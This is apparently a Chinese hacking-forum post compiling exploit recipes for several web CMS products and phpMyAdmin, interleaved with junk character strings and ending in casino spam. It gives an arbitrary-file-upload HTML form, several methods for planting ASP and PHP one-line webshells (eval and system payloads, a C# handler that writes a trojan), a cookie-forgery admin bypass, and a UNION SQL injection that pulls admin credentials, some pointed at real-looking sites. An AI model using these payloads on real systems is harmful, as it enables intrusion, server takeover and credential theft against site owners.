YxShop易想购物商城4.7.1版本任意文件上传漏洞
+ w5 u. a& S7 ]; i8 K2 s( p( `
, X% q, y @: R( N, H; d9 V
http://xxoo.com/controls/fckedit
... aspx/connector.aspx
, I6 E7 k; |* E% ~
跳转到网站根目录上传任意文件。
- t3 D; [- w- r4 M. _/ L) {
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
0 D) B$ V) C2 d9 L4 S
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
. P8 H5 C. H4 |: _6 M
Upload a new file:<br>
: U; t) z( L6 ?# X6 V- s) { @
<input type="file" name="NewFile" size="50"><br>
- W! z2 \7 d# E8 D
<input id="btnUpload" type="submit" value="Upload">
# E6 m: P# K, c/ N! D
</form>
7 C! g4 _! w) t; F9 J8 _
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: K9 M) `' z; Q) m! c9 f
0 o* E, w3 S$ D7 V) B( U7 T
SDcms 后台拿webshell
0 H% |% Q) F- s
D5 F N6 O4 n" o
第一种方法:
4 z* u% i0 R, J
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
+ _7 F i, K5 G) E7 r; Z" { Q
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
+ t/ @; U# \2 B. m/ c
用菜刀链接
http://www.xxx.com/inc/const.asp
就搞定了。
. X. v2 D6 @- f" [3 ^
第二种方法:
! A* J; C2 V0 e1 y5 S: W
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
/ Z, ~: \) u4 q& [, |* B& w4 M6 c, f
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
, |9 E) v# |. j' P i/ C
第三种方法:
+ g6 }) m, |+ x/ S' z
进入后台-->界面管理-->模板文件管理-->创建文件
' {; R& Z: u! r, h7 @
文件名写入getshell.ashx
# u8 ]8 `- Z, z" u
内容写入下面内容:
" t# t7 ]* B0 A
/====================复制下面的=========================/
7 J( q- l; r# K2 e
<%@ WebHandler Language="C#" Class="Handler" %>
4 d5 _0 ~1 F0 U! E# ?$ A0 e' L
using System;
" L' O! H. ?) l; @+ B
using System.Web;
# J% m) X$ n- u2 u- y; H
using System.IO;
2 K7 c/ h! C; u. d$ N0 U( c
public class Handler : IHttpHandler {
1 f3 K. d; e6 ^+ Z
public void ProcessRequest (HttpContext context) {
. g; y& n [ v1 V
context.Response.ContentType = "text/plain";
3 ?, l( D9 x: G0 |6 u7 Z
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
! J% _ M- e" k! {, S. d4 D
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
, ?* K4 p' P) e
file1.Flush();
1 Z6 p9 N* k1 I# a" N% l
file1.Close();
9 [# \/ R- H0 C E7 ?
}
. ~6 P$ M- v& d4 ]: J8 A8 b
public bool IsReusable {
% F% P4 V6 ^! b: z' M( H, G9 \3 }
get {
! }& z; }6 u; w! t! G; t
return false;
: q1 y) o* F7 f/ L
}
% A3 `1 Y% v4 o
}
' _4 C1 H- X" G3 Y) @0 e
}
3 ^( C) e+ x( a6 T
/=============================================/
& e9 A/ ~4 J* }: y/ b
访问这个地址:
http://www.xxx.com/skins/2009/getshell.ashx
( v% G2 f; K' J" R
会在
http://www.xxx.com/skins/2009/
目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
8 l. u+ x4 ~, ~8 o9 F7 g! m
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: A/ d+ H3 x' B0 [' [9 q
4 }" w- _; A) c5 w
ESCMS网站管理系统0day
& r# y P9 I! |/ ~
r* p" ?+ V! }1 [: |; ~8 {
后台登陆验证是通过admin/check.asp实现的
/ `5 [. A# `: M0 P
5 f' v7 E3 t8 p( _7 ]7 D
首先我们打开
http://target.com/admin/es_index.html
, `! [0 Q9 g# Z
然后在COOKIE结尾加上
& Q5 k9 I/ ~2 h, K; g* M* T+ H
; ESCMS$_SP2=ES_admin=st0p;
0 u* J$ i8 j: F' j- y( a+ k9 h
修改,然后刷新
, ? M J& ]& g9 \" M( g$ ~
进后台了嘎..
7 C; _4 o0 r; F; {# A! K
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
' @ C7 Z% Z! z2 b- D
G$ o' U0 y1 Q. l! L
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
$ x# K' T! D! O* s
嘿嘿,成功了,shell地址为
http://target.com/admin/diy.asp
1 d" `# r/ w1 \2 `) }2 c7 h
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
2 x& D9 E: M. `$ z& q
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
: T2 T: P' N4 e, r$ T
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 w; y) f! f9 q$ {- y; o% m! P
4 z/ O( H* F$ n. I
宁志网站管理系统后台无验证漏洞及修复
# ^: U5 W& T7 p3 n
, A- U7 k; C) C7 X# q0 r
网上搜了一下,好像没有发布.如有雷同纯粹巧合!
4 X# ^; o6 k ~" W9 \
官方网站:
www.ningzhi.net
- u7 x6 F: Q, Q1 r2 n
学校网站管理系统 V.2011版本
, q& @2 p) k7 e- ?+ X9 e+ y, [
http://down.chinaz.com/soft/29943.htm
6 [2 `, h( ]5 T6 [) ^# e
其它版本(如:政府版等),自行下载.
% k9 J1 t8 O" D
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
4 i" @- r! u f
login.asp代码如下:
7 o( [" n! k& K, T5 ^" r
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
2 B( ]! B% o- z0 P; i
manage.asp代码我就不帖出来了.反正也没验证.
5 a, G5 A" x' u
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
7 c7 a! q5 E. T6 a
漏洞利用:
; h( m; R6 L. _, k' s9 |3 H
直接访问
http://www.0855.tv/admin/manage.asp
0 e$ X5 N( `) Z$ N
数据库操作:
http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
% f$ i( F, R- h( z$ e# `: t! ?3 p
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- |' d0 T: N& y9 z; ?! k
* W5 ? R* A2 ]/ Q& v# e9 ]3 g2 X
phpmyadmin拿shell的四种方法总结及修复
0 C0 x9 E3 g; L5 O. ?# l) i( r& H* o% D
1 g9 ~8 M& R: @3 a) ]% u8 f1 T
方法一:
& h: z" z) P9 n' y/ e' _
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
+ }3 F3 V7 t' g, K
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
: r/ ?6 |- U" a) O G* G8 ^, t2 w8 `3 v
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
% Y% s/ O& j, K/ V/ Q( b
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
2 ?( B. P+ M( K' x& ^. P
一句话连接密码:7on
7 I) U1 E |8 {, q9 F" o
方法二:
0 X, i. z v6 t1 A& {* n/ I# ~8 r
读取文件内容: select load_file('E:/xamp/www/s.php');
# x, w0 z7 h1 O8 o: }8 W1 B4 |
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
- m( I, m. V4 g" W3 K( p
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
4 K4 P8 `" @. ^$ O1 ~- U
方法三:
5 {3 J9 t- V' L3 Q8 j
JhackJ版本 PHPmyadmin拿shell
- E9 r9 u; U! o
Create TABLE study (cmd text NOT NULL);
3 t' W1 `7 b* w5 M+ z; Y
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
5 [- F0 S' ~" o. ?8 Y& q8 u
select cmd from study into outfile 'E:/wamp/www/7.php';
: ~$ e# t' J: T; p: R1 z0 S6 b
Drop TABLE IF EXISTS study;
: p6 B* y! ~3 C) q# @* Q0 B }. h8 l
<?php eval($_POST[cmd])?>
5 c; C+ S2 R" O h8 a- H2 K5 ^" R
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
: i0 Z! h2 x0 d0 m
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
& V6 F. f5 _9 e; q3 Y* S+ x
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
+ }, F, L. C/ _3 L3 }- w
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
1 ]# I. `( u$ x p
方法四:
" }" p! E+ y# P
select load_file('E:/xamp/www/study.php');
( w, Q+ y6 l3 D$ F) H v% W
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
" v. c* E8 A6 [- z7 N2 Q* V# L1 H% n- M
然后访问网站目录:
http://www.2cto.com/study.php?cmd=dir
3 n Y& r( f- T, P& T
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 R9 t8 r8 q l# y' T
3 C5 }/ O3 \* ~. C6 O! P
NO.001中学网站管理系统 Build 110628 注入漏洞
7 T: Y/ c& ?% u3 s. M. X
. U# _: r) D* B; o
NO.001中学网站管理系统功能模块:
) V' v" w; l" i) ?: [
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
1 a! {9 w2 [, O! f
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
0 b) E' O8 Y s2 y& u3 H, u- Q
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
% L3 b- z8 A, `
4.视频图片管理:一级分类,动态添加视频或者图片等信息
$ v9 V9 u( D' U' C
5.留言管理:对留言,修改,删除、回复等管理
9 K" [) S) [( b7 j$ r7 B+ U+ e
6.校友频道:包括校友资料excel导出、管理等功能
/ K- `! J i9 L/ a
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
. o9 i" q" |: h( |5 u
默认后台:admin/login.asp
8 r+ H6 k5 F [8 M6 Q
官方演示:
http://demo.001cms.net
2 e* n. C3 H- F0 j6 }" R! ^
源码下载地址:
http://down.chinaz.com/soft/30187.htm
3 b: Z m: {7 I2 P' w* s3 }
EXP:
" J4 v0 U) i# d, m' _5 ~ H, h
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
- i% n6 B9 B' W) D8 Q
测试:
http://demo.001cms.net/shownews.asp?type=
新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
: q3 k6 s/ A3 L8 m a
getshell:后台有备份,你懂的
0 C. M8 v! T9 R2 I# A. w
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
+ |8 R2 \" R0 B: k5 m0 D' E$ @
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
作者:
匿名
时间:
2017-10-28 08:21
casino slots
online casino canada
new online casino
slot machines
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2